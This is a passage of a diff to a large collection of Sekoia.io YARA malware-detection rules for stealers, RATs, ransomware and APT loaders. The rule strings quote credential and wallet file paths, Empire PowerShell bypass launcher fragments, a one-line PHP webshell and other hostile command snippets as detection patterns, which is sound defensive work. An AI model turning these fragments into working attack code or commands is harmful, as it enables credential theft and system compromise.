+		reference = "https://www.crowdstrike.com/blog/fake-recovery-manual-used-to-deliver-unidentified-stealer/"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/infostealer_win_daolpu_str.yar#L1-L26"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "1d60f53014fb1934a85a573856244431c8f565c2f024511991817e6235566815"
+		logic_hash = "9372a88efcdca6ca57f354fb31569522e5458271cc51dfedf09c6178a47a5b67"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -244690,25 +244517,33 @@ rule SEKOIA_Apt_Muddywater_Powgoop_Decode_Loop : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$s1 = "System.Collections.Generic.List[System.Object]" ascii wide
-		$s2 = "$d.Add($in[$i]);" ascii wide
-		$s3 = "[System.Convert]::FromBase64String(" ascii wide
+		$str01 = "Content-Type: %s%s%s" ascii
+		$str02 = "Content-Disposition: %s%s%s%s%s%s%s" ascii
+		$str03 = "\\CocCoc\\Browser\\User Data\\Local State" ascii
+		$str04 = "\\Microsoft\\Edge\\User Data\\Default\\Login Data" ascii
+		$str05 = "\\Mozilla\\Firefox\\Profiles" ascii
+		$str06 = "No MAC Address Found" ascii
+		$str07 = "C:\\Windows\\Temp\\" ascii
+		$str08 = "C:\\Windows\\Temp\\result.txt" ascii
+		$str09 = "Privatekey@2211#$" ascii
+		$str10 = "CryptStringToBinaryA Failed to convert BASE64 private key." ascii
+		$str11 = "taskkill /F /IM chrome.exe" ascii
 
 	condition:
-		filesize < 1MB and $s2 in ( @s1 .. @s1 + 400 ) and $s3 in ( @s1 .. @s1 + 400 )
+		uint16( 0 ) == 0x5A4D and 8 of them
 }
-rule SEKOIA_Infostealer_Win_Raccoon_Str_Takemypainback : FILE
+rule SEKOIA_Rat_Win_Babylon : FILE
 {
 	meta:
-		description = "Detect Raccoon based on specific strings"
+		description = "Finds Babylon RAT samples based on specific strings"
 		author = "Sekoia.io"
-		id = "2148636e-47c7-4bf2-8d1e-df68faf65111"
-		date = "2022-10-03"
+		id = "ba9ab80a-ad7e-4746-aff2-9328440cbb25"
+		date = "2023-08-22"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/infostealer_win_raccoon_str_takemypainback.yar#L1-L19"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/rat_win_babylon.yar#L1-L27"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "50d30828dab7e197619eeac4ebd2ab6692a9ac40a5091e23642cd1bdde8e9910"
+		logic_hash = "142f10e519561d6552c9cb8d267280b9ede203a2f4723d904ab07217b0565bd1"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -244716,59 +244551,81 @@ rule SEKOIA_Infostealer_Win_Raccoon_Str_Takemypainback : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$str0 = "\\ffcookies.txt" wide
-		$str1 = "TakeMyPainBack" wide
-		$str2 = "wallet.dat" wide
-		$str3 = "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall" wide
-		$str4 = "Network\\Cookies" wide
+		$str01 = "ParadoxRAT_Client" ascii
+		$str02 = "*** in database %s ***" ascii
+		$str03 = "\\drivers\\etc\\HOSTS" ascii
+		$str04 = "Babylon RAT Client" wide
+		$str05 = "ClipBoard.txt" wide
+		$str06 = "a,ccs=UTF-16LE" wide
+		$str07 = "[%02d/%02d/%d %02d:%02d:%02d] [%s] (%s):" wide
+		$str08 = "Update Failed [OpenProcess]..." wide
+		$str09 = "DoS Already Active..." wide
+		$str10 = "File Download and Execution Failed..." wide
+		$str11 = "LgDError33x98dGetProcAddress" wide
+		$str12 = "FriendlyName" wide
+		$str13 = "@SPYNET" wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 4 of them
+		uint16( 0 ) == 0x5a4d and 8 of ( $str* )
 }
-rule SEKOIA_Apt_Kimsuky_Vbs : FILE
+rule SEKOIA_Rat_Win_Xworm_V2 : FILE
 {
 	meta:
-		description = "VBS files used by Kimsuky"
+		description = "Finds XWorm v2 samples based on characteristic strings"
 		author = "Sekoia.io"
-		id = "3f92dbda-2ddb-4fa3-a587-743f65ced9e4"
-		date = "2024-09-23"
+		id = "6cf06f52-0337-415d-8f29-f63d67e228f8"
+		date = "2022-11-07"
 		modified = "2024-12-19"
-		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_kimsuky_vbs.yar#L1-L23"
+		reference = "https://blog.cyble.com/2022/08/19/evilcoder-project-selling-multiple-dangerous-tools-online/"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/rat_win_xworm_v2.yar#L1-L38"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		hash = "12386be22ca82fce98a83a5a19e632bc"
-		hash = "7b5783d42240651af78ebf7e01b31fe8"
-		hash = "ff7d68e5fb253664ce64c85457b28041"
-		hash = "622358469e5e24114dd0eb03da815576"
-		hash = "edbb2aa40408e2a7936067ace38b445b"
-		hash = "73ed9b012785dc3b3ee33aa52700cfe4"
-		logic_hash = "b4a05a50c8223198082f6f6aa7309cc19b019738fb99e37c6f2140b8ef7cecc9"
+		logic_hash = "58a2dbfbd453855021942902a6d55d150eee3acba67a294da24448cfca4f811e"
 		score = 75
-		quality = 80
+		quality = 78
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = ")):Next:Execute " ascii
-		$ = "=\"\":" ascii
-		$ = "\":for "
+		$str01 = "XWorm.exe" wide ascii
+		$str02 = "ngrok" wide ascii
+		$str03 = "Mutexx" ascii
+		$str04 = "FileManagerSplitFileManagerSplit" wide
+		$str05 = "InstallngC" wide
+		$str06 = "downloadedfile" wide
+		$str07 = "creatfile" wide
+		$str08 = "creatnewfolder" wide
+		$str09 = "showfolderfile" wide
+		$str10 = "hidefolderfile" wide
+		$str11 = "txtttt" wide
+		$str12 = "\\root\\SecurityCenter2" wide
+		$str13 = "[USB]" wide
+		$str14 = "[Drive]" wide
+		$str15 = "[Folder]" wide
+		$str16 = "HVNC" wide
+		$str17 = "http://exmple.com/Uploader.php" wide
+		$str18 = "XKlog.txt" wide
+		$str19 = "Select * from AntivirusProduct" wide
+		$str20 = "runnnnnn" wide
+		$str21 = "RunBotKiller" wide
+		$str22 = "bypss" wide
+		$str23 = "<Xwormmm>" wide
 
 	condition:
-		all of them and filesize < 10KB
+		uint16( 0 ) == 0x5A4D and 12 of them
 }
-rule SEKOIA_Infostealer_Win_Acridrain_Mar23 : FILE
+rule SEKOIA_Apt_Gamaredon_Ddrdoh_Vbs_Downloader_Vbs : FILE
 {
 	meta:
-		description = "Finds AcridRain samples"
+		description = "Detects malicious VBScript executed by LNK/mshta"
 		author = "Sekoia.io"
-		id = "049b502a-0fb6-4fa9-a1ce-f01a40269bdb"
-		date = "2023-03-21"
+		id = "cc29d5d9-58bd-4f68-8673-daa41abfc7be"
+		date = "2023-01-24"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/infostealer_win_acridrain_mar23.yar#L1-L40"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_gamaredon_ddrdoh_vbs_downloader_vbs.yar#L1-L20"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "7fa1822acc6264a3a58fffef3fc572f8818d99037b20d5abb8bfb41f025949d4"
+		logic_hash = "c91e1ce26c0735e8c68fe39f2fbeda8aed51cd4f9a0b967b5d184843728dcef4"
 		score = 75
 		quality = 78
 		tags = "FILE"
@@ -244776,46 +244633,57 @@ rule SEKOIA_Infostealer_Win_Acridrain_Mar23 : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$str01 = "\",\"r\":" ascii
-		$str02 = "\",\"s\":\"" ascii
-		$str03 = "\",\"p\":\"" ascii
-		$str04 = "\",\"a\":\"" ascii
-		$str05 = ",\"c\":" ascii
-		$str06 = ",\"g\" :" ascii
-		$str07 = "v7166637466625297979 t2537736810932639330 ath5ee645e0 altpriv cvcv=2 cexpw=1 smf=0" ascii
-		$str08 = "Content-Type: multipart/form-data; boundary=----974767299852498929531610575" ascii
-		$str09 = "\\Roaming\\Bitwarden\\data\\bitwarden.sqlite3" ascii
-		$ste01 = "\\Roaming\\Exodus\\exodus.wallet" ascii
-		$ste02 = "\\Roaming\\Electron Cash\\wallets" ascii
-		$ste03 = "\\Roaming\\com.liberty.jaxx\\IndexedDB\\file__0.indexeddb.leveldb" ascii
-		$ste04 = "\\Local Extension Settings\\" ascii
-		$ste05 = "cnmamaachppnkjgnildpdmkaakejnhae" ascii
-		$ste06 = "ffnbelfdoeiohenkjibnmadjiehjhajb" ascii
-		$ste07 = "\\formhistory.sqlite" ascii
-		$ste08 = "\\logins.json" ascii
-		$ste09 = "encrypted_key" ascii
-		$ste10 = "\\Login Data" ascii
-		$enc01 = "bX5cVw8FKyAKZVxXXUAdSTUXCXdCV0FoOxoSF0ZEUEZS" ascii
-		$enc02 = "bX5cVw8FKywUaVVbRlkyPAQAFCB1U0dV" ascii
-		$enc03 = "bX5cVw8FKzQvUBFhRkYINSIWA3IRdlJADw==" ascii
-		$enc04 = "bX5cVw8FKzYWdUVcWl8iCBU5NXBERl1dBTUiFgNyEXZSQA8=" ascii
-		$enc05 = "bWBcVQMAGQI6UEJbGGgeGxgDD2xUQW9QCw8WEAp0" ascii
+		$ = "b24gZXJyb3IgcmVzd" ascii
+		$ = "BinaryStream.readtext" ascii nocase
+		$ = "createobject(\"msxml2.domdocument.3.0\").createelement(" ascii nocase
+		$ = "Dim cSecond, cMinute, CHour, cDay, cMonth, cYear" ascii nocase
+		$ = "tDate & \"T\" & tTime"
+		$ = "AutoOpen" ascii nocase
+
+	condition:
+		5 of them and filesize < 50KB
+}
+rule SEKOIA_Stealer_Win_Mgbot_Credential_Stealer : FILE
+{
+	meta:
+		description = "Detect MgBot credential stealer plugin"
+		author = "Sekoia.io"
+		id = "e06501c1-c842-43f7-a429-9026bc0a4fd4"
+		date = "2024-03-20"
+		modified = "2024-12-19"
+		reference = "https://www.welivesecurity.com/2023/04/26/evasive-panda-apt-group-malware-updates-popular-chinese-software/"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/stealer_win_mgbot_credential_stealer.yar#L1-L21"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
+		logic_hash = "27f1b0ac818753804f0e67ac158d9376ab6beff8613ef94a1aa6cf8dd6815d49"
+		score = 75
+		quality = 80
+		tags = "FILE"
+		version = "1.0"
+		classification = "TLP:CLEAR"
+		hash1 = "174a62201c7e2af67b7ad37bf7935f064a379f169cf257ca16e912a46ecc9841"
+		hash2 = "cb7d9feda7d8ebfba93ec428d5a8a4382bf58e5a70e4b51eb1938d2691d5d4a5"
+
+	strings:
+		$ = "Software\\Aerofox\\Foxmail\\Indenties" wide
+		$ = "Software\\Aerofox\\FoxmailPreview" wide
+		$ = "IMAP Password" wide
+		$ = "POP3 Password" wide
 
 	condition:
-		uint16( 0 ) == 0x5A4D and 5 of ( $str* ) and 7 of ( $ste* ) and 1 of ( $enc* )
+		uint16be( 0 ) == 0x4d5a and all of them
 }
-rule SEKOIA_Apt_Apt28_Wayzgoose_Exploit_String : FILE
+rule SEKOIA_Apt_Reaper_Malicious_Lnk : FILE
 {
 	meta:
-		description = "Detects APT28's Wayzgoose exploit strings"
+		description = "No description has been set in the source file - SEKOIA"
 		author = "Sekoia.io"
-		id = "23d9e09e-202c-47f5-abf7-6b5085e44400"
-		date = "2024-04-29"
+		id = "8f055d1b-5727-4d77-9671-cdbb1ea69d5f"
+		date = "2023-09-12"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_apt28_wayzgoose_exploit_string.yar#L1-L20"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_reaper_malicious_lnk.yar#L1-L15"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "804de275f7e8c43fe5690c0bd9338b134c0c47f845f1c3b3a747c3765815084c"
+		logic_hash = "8cec5819dd7b01b3993acae056f5640fa28ffe76b05d2d9e59779a73eb00bd6e"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -244823,74 +244691,48 @@ rule SEKOIA_Apt_Apt28_Wayzgoose_Exploit_String : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "wayzgoose.dll"
-		$ = "wayzgoose_get_version"
-		$ = "NtSetInformationFile"
-		$ = "ZwDuplicateObject"
-		$ = "ZwClose"
+		$ = "*rshell.exe" wide
+		$ = "/od') do call" wide
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and 4 of them and filesize < 500KB
+		uint32be( 0 ) == 0x4c000000 and all of them
 }
-rule SEKOIA_Backdoor_Win_Spacecolon : FILE
+rule SEKOIA_Crypter_Win_Dotrunpex : FILE
 {
 	meta:
-		description = "Finds Spacecolon samples based on specific strings (ScHackTool component)"
+		description = "Detect the dotRunpeX crypter based on strings"
 		author = "Sekoia.io"
-		id = "ae09f0e2-e913-44d5-abe1-715170368cc8"
-		date = "2023-08-25"
+		id = "6fb4ffe0-3a5c-432c-8ae2-404bb5960c30"
+		date = "2023-06-08"
 		modified = "2024-12-19"
-		reference = "https://www.welivesecurity.com/en/eset-research/scarabs-colon-izing-vulnerable-servers/"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/backdoor_win_spacecolon.yar#L1-L39"
+		reference = "https://github.com/SEKOIA-IO/Community"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/crypter_win_dotrunpex.yar#L1-L15"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "1251df19c521e9ee9da307d56eea265265f2bee4a8e7eec099e4ebfb4e2bd7a2"
+		logic_hash = "8a2b9e19b49ba17f976241bec5323121ba13d2ce39fdcf2777fd97a230211e75"
 		score = 75
-		quality = 78
+		quality = 80
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$str01 = "Before Work" ascii
-		$str02 = "DEFENDER OFF" ascii
-		$str03 = "Stop Service" ascii
-		$str04 = "Kill All (Default)" ascii
-		$str05 = "Keyboard EN" ascii
-		$str06 = "After Work" ascii
-		$str07 = "Del Shadow Log" ascii
-		$str08 = "Kill OSK" ascii
-		$str09 = "PWGEN" ascii
-		$str10 = "Character :" ascii
-		$str11 = "PW GEN" ascii
-		$str12 = "Cobian UI Pass" ascii
-		$str13 = "Credssp" ascii
-		$str14 = "Username :" ascii
-		$str15 = "Password :" ascii
-		$str16 = "TSpeedButton" ascii
-		$str17 = "Ab1q2w3e!" ascii
-		$str18 = "PC Details" ascii
-		$str19 = "Mimi Dump" ascii
-		$str20 = "MIMI Dump" ascii
-		$str21 = "powershell -ExecutionPolicy Bypass -File \"" wide
-		$str22 = "lastlog.txt" wide
-		$str23 = "$AdminGroupName = (Get-WmiObject -Class Win32_Group -Filter 'LocalAccount = True AND SID = \"S-1-5-32-544\"').Name" wide
-		$str24 = "net localgroup $AdminGroupName " wide
+		$ = {52 00 75 00 6e 00 70 00 65 00 58 00 2e 00 53 00 74 00 75 00 62 00 2e 00 46 00 72 00 61 00 6d 00 65 00 77 00 6f 00 72 00 6b 00 2e 00 65 00 78 00 65}
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 17 of them
+		uint16( 0 ) == 0x5A4D and all of them
 }
-rule SEKOIA_Clipper_Win_Cryptoclippy : FILE
+rule SEKOIA_Backdoor_Xploitspy_Strings : FILE
 {
 	meta:
-		description = "Finds CryptoClippy samples"
+		description = "Detects XploitSPY DEX file"
 		author = "Sekoia.io"
-		id = "eaa98a8e-e29e-43a4-8b2d-2137d33d4116"
-		date = "2023-04-11"
+		id = "0aa86c2e-dba6-4ef4-a47e-f1b43e04f1f3"
+		date = "2022-08-24"
 		modified = "2024-12-19"
-		reference = "https://unit42.paloaltonetworks.com/crypto-clipper-targets-portuguese-speakers/"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/clipper_win_cryptoclippy.yar#L1-L25"
+		reference = "https://github.com/SEKOIA-IO/Community"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/backdoor_xploitspy_strings.yar#L1-L28"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "057cb5bb957c2338a50c05cfa0177f75bcf263281ddcc5f365298bccafc64cb4"
+		logic_hash = "eabb1dbeaa8aefc33beb7fb158bbd8ad2c5b848d34c99473704da36a6dc461aa"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -244898,61 +244740,60 @@ rule SEKOIA_Clipper_Win_Cryptoclippy : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$str01 = "C:\\mbedtls\\library\\" ascii
-		$str02 = "udp://8.8.8.8:53" ascii
-		$str03 = "Upgrade: websocket" ascii
-		$str04 = "%s\\%s.lnk" ascii
-		$str05 = "%s\\%s.ps1" ascii
-		$str06 = "%s\\%s.bat" ascii
-		$str07 = "set PSExecutionPolicyPreference=Unrestricted" ascii
-		$str08 = "schtasks /delete /tn \"%ls\" /f" ascii
-		$str09 = "SetClipboardData" ascii
-		$str10 = "SetWinEventHook" ascii
+		$ = { 04 30 78 43 42 00 }
+		$ = { 04 30 78 43 4C 00 }
+		$ = { 04 30 78 43 4F 00 }
+		$ = { 04 30 78 46 49 00 }
+		$ = { 04 30 78 47 50 00 }
+		$ = { 04 30 78 49 4E 00 }
+		$ = { 04 30 78 4C 4F 00 }
+		$ = { 04 30 78 4D 49 00 }
+		$ = { 04 30 78 4E 4F 00 }
+		$ = { 04 30 78 50 4D 00 }
+		$ = { 04 30 78 53 4D 00 }
+		$ = { 04 30 78 57 49 00 }
 
 	condition:
-		uint16( 0 ) == 0x5A4D and 8 of them
+		uint32be( 0 ) == 0x6465780A and filesize < 1MB and 10 of them
 }
-rule SEKOIA_Apt_Scanbox_Obfuscated_Versions : FILE
+rule SEKOIA_Backdoor_Powershellempire_Batlauchers : FILE
 {
 	meta:
-		description = "Detects obfuscated versions of the scanbox framework"
+		description = "Detect BAT launchers for Empire"
 		author = "Sekoia.io"
-		id = "2866cead-7f16-4895-80ef-aad6fb66e864"
-		date = "2022-09-01"
+		id = "ad371665-ec59-45c8-9d99-2a675842c384"
+		date = "2022-04-15"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_scanbox_obfuscated_versions.yar#L1-L20"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/backdoor_powershellempire_batlauchers.yar#L1-L17"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "0395d1ac9a593aa8249f6d16c485e431349cecf2f379d2b5bac466541f71968c"
+		logic_hash = "0453c739ad936b0cc5ed2e36ba4a011a90600b74ca23c08165c23a3e63fe60e9"
 		score = 75
-		quality = 80
+		quality = 74
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "$_$_$_$__$_____$__$_$_$_$__$"
-		$ = "NztCm_NcDkh"
-		$ = "____$_$__$__$_______w____$_$__$__$_____i____$_$__$__$_____"
-		$ = "391,379,398,381,386"
-		$ = "plguinurl"
-		$ = "plugin_timeout*1000"
+		$ = "powershell -noP -sta -w 1 -enc  SQB" nocase wide ascii
+		$ = "powershell -ep bypass -noP -sta -w 1 -enc SQB" nocase wide ascii
+		$ = "-nol -nop -ep bypass \"[IO.File]::ReadAllText('%~f0')|iex" nocase wide ascii
 
 	condition:
-		2 of them and filesize < 500KB
+		any of them and filesize < 1MB
 }
-rule SEKOIA_Guerrilla_Lemongroup : FILE
+rule SEKOIA_Ransomware_Win_Karma : FILE
 {
 	meta:
-		description = "No description has been set in the source file - SEKOIA"
+		description = "Detect the Karma ransomware payload"
 		author = "Sekoia.io"
-		id = "df635b5a-a19a-48ab-9a3a-9723e265c71d"
-		date = "2023-05-23"
+		id = "efd87a17-7c99-404a-8ea6-2f5c2121f9f2"
+		date = "2021-08-25"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/guerrilla_lemongroup.yar#L1-L28"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/ransomware_win_karma.yar#L1-L21"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "b644cb537a42217f2549f37bfe07ae0b7ba39fc248ab3d5fd870384c7684683b"
+		logic_hash = "ef272be7ae5fea084120db95f7b002e9061d72442836e836ca43ddc7b461be4e"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -244960,33 +244801,28 @@ rule SEKOIA_Guerrilla_Lemongroup : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$dex = { 64 65 78 0A 30 33 ?? 00 }
-		$odex = { 64 65 79 0A 30 33 ?? 00 }
-		$s2 = "data response code===" ascii
-		$s3 = "httpCon:" ascii
-		$s4 = "processName :" ascii
-		$s5 = "startListTasks......" ascii
-		$s6 = "url==" ascii
-		$s7 = "java core run ZYGOTE_PROCESS" ascii
-		$api1 = "/api.php" ascii
-		$api2 = "/event.php" ascii
-		$api3 = "/apiRS.php" ascii
+		$a1 = "KARMA" ascii
+		$u1 = "KARMA" wide
+		$u2 = "-ENCRYPTED.txt" wide
+		$u3 = "Encrypting directory:" wide
+		$u4 = "Encrypting file:" wide
+		$u5 = "Trying to import ECC public key..." wide
 
 	condition:
-		($dex at 0 or $odex at 0 ) and filesize > 100KB and filesize < 5MB and 5 of ( $s* ) and 1 of ( $api* )
+		uint16( 0 ) == 0x5A4D and filesize < 150KB and all of them
 }
-rule SEKOIA_Generic_Php_Webshell : FILE
+rule SEKOIA_Rat_Win_Ratel_Strings : FILE
 {
 	meta:
-		description = "Detects generic webshell"
+		description = "Detect RATel based on characteristic strings"
 		author = "Sekoia.io"
-		id = "415a96bd-11a4-40e7-8335-ac1f1a99d17c"
-		date = "2023-12-08"
+		id = "d0c8b89b-c811-47aa-9e03-717998c40d91"
+		date = "2023-04-24"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/generic_php_webshell.yar#L1-L15"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/rat_win_ratel_strings.yar#L1-L28"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "617264a785b8e9e87a39e12d7b72963d94e0686a174716347369fe71ab7a78af"
+		logic_hash = "ff5640b03ec3e535cdb86c2a0feb52d0c472928ff88a36ec9f66ac8aa07c9f69"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -244994,23 +244830,35 @@ rule SEKOIA_Generic_Php_Webshell : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "system($_POST['a']);"
+		$s1 = "[-] Error when changing folder." ascii
+		$s2 = "cmd.exe" wide
+		$s3 = "back slash find: " ascii
+		$s4 = "MOD_ALL:" wide
+		$s5 = "MOD_PERSISTENCE" wide
+		$s6 = "MOD_DESTRUCTION:" wide
+		$s7 = "MOD_RECONNECT" wide
+		$s8 = "Software\\Microsoft\\Windows\\CurrentVersion\\Run" wide
+		$s9 = "powershell.exe -command \"([Security.Principal.WindowsPrincipal] [Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole] 'Administrator')\"" wide
+		$s10 = "The command was executed successfully but no data was returned."
+		$s11 = "[-] TIMEOUT IN CREATEPROCESS, but all the processes in the name of: " ascii
+		$s12 = "we were well and truly killed." ascii
 
 	condition:
-		all of them and filesize < 500
+		( uint16be( 0 ) == 0x4d5a ) and filesize > 500KB and filesize < 3MB and 8 of them
 }
-rule SEKOIA_Apt_Apt37_Malicious_Hta_File : FILE
+rule SEKOIA_Infostealer_Win_Enigma_Initial_Loader : FILE
 {
 	meta:
-		description = "Detects malicious APT37 files"
+		description = "Find initial loader of Enigma Stealer based on specific strings"
 		author = "Sekoia.io"
-		id = "22a98c27-8ff4-4760-b505-f8eacf4dabda"
-		date = "2023-03-06"
+		id = "664fe8de-b406-4d63-9a4b-1c350b444f00"
+		date = "2023-01-30"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_apt37_malicious_hta_file.yar#L1-L20"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/infostealer_win_enigma_initial_loader.yar#L1-L24"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "85289bea86641ea9c359c361d075783449d453017485170abc87c47872792210"
+		hash = "03b9d7296b01e8f3fb3d12c4d80fe8a1bb0ab2fd76f33c5ce11b40729b75fb23"
+		logic_hash = "b7687a480a2a633e7cc9a60d62f3392011712bd018ed634927419cfb4edb4a78"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -245018,57 +244866,55 @@ rule SEKOIA_Apt_Apt37_Malicious_Hta_File : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$s1 = "<HTML>" nocase
-		$s2 = " UwB0AGEAcgB0AC0AUwBs" ascii
-		$s3 = "= new ActiveXObject(" ascii
-		$s4 = "\", \"\", \"open\", 0);" ascii
-		$s5 = ".moveTo(" ascii
-		$s6 = "self.close();"
+		$str01 = "/getFile?file_id=" ascii
+		$str02 = "/file/bot" ascii
+		$str03 = "?file_id=" ascii
+		$str04 = "pInternetSetOptionA failed" wide
+		$str05 = "list_messages[file_path] failed" wide
+		$str06 = "iE&xit" wide
+		$str07 = "[GetTgFileById][GetTgRequest] reply is NULL" wide
+		$str08 = "Telegram request failed" wide
+		$str09 = "bot getted" wide
 
 	condition:
-		$s1 at 0 and all of them and filesize < 1MB
+		uint16( 0 ) == 0x5A4D and 4 of them
 }
-rule SEKOIA_Apt_Apt_K_47_Walkershell : FILE
+
+rule SEKOIA_Apt_Apt33_Tickler : FILE
 {
 	meta:
-		description = "Detects WalkerShell used by APT-K-47"
+		description = "Detects APT33 Tickler malware"
 		author = "Sekoia.io"
-		id = "201f8415-32d4-4af1-ba80-734554ced728"
-		date = "2024-02-14"
+		id = "e9ecf678-350c-47d2-ab4c-522974c70a45"
+		date = "2024-08-29"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_apt_k_47_walkershell.yar#L1-L20"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_apt33_tickler.yar#L4-L19"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "0dffd8e4d6c244a4faea0f8b8cda1e544a732ad9982e7963b21d5f71080f8f5d"
+		hash = "8bd712b0a49f4fecd39d30ebd121832c"
+		hash = "3f29429fce0168748d7cc75e1478aedc"
+		logic_hash = "97b858819a1920e6dcdd1a9489754a948de8e6e39b4282e7fe4f6431617a9849"
 		score = 75
 		quality = 80
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
-	strings:
-		$s1 = "\\n kuskure" ascii wide
-		$s2 = "col.log.txt" ascii wide
-		$s3 = "polor" ascii wide
-		$s4 = "emit" ascii wide
-		$s5 = "delta" ascii wide
